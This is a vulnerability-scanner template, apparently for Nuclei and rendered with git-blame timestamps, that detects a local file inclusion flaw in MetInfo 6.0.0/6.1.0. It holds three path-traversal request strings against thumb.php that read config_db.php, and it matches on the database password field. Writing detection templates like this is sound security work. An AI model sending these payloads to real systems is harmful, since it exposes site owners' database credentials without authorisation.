2021-02-20 00:25:43 +00:00
|
|
|
id: metinfo-lfi
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-02-20 00:25:43 +00:00
|
|
|
info:
|
|
|
|
name: MetInfo 6.0.0/6.1.0 LFI
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2021-10-26 12:27:16 +00:00
|
|
|
description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://paper.seebug.org/676/
|
2021-02-20 13:54:20 +00:00
|
|
|
tags: metinfo,lfi
|
2021-02-20 00:25:43 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
|
|
|
|
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
|
|
|
|
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
|
2021-10-02 12:27:33 +00:00
|
|
|
|
2021-10-02 06:42:22 +00:00
|
|
|
stop-at-first-match: true
|
2021-02-20 00:25:43 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-10-02 12:27:33 +00:00
|
|
|
|
2021-02-20 00:25:43 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "con_db_pass"
|
|
|
|
- "con_db_name"
|
|
|
|
part: body
|
|
|
|
condition: and
|
2021-10-02 12:27:59 +00:00
|
|
|
|
2021-02-20 00:25:43 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|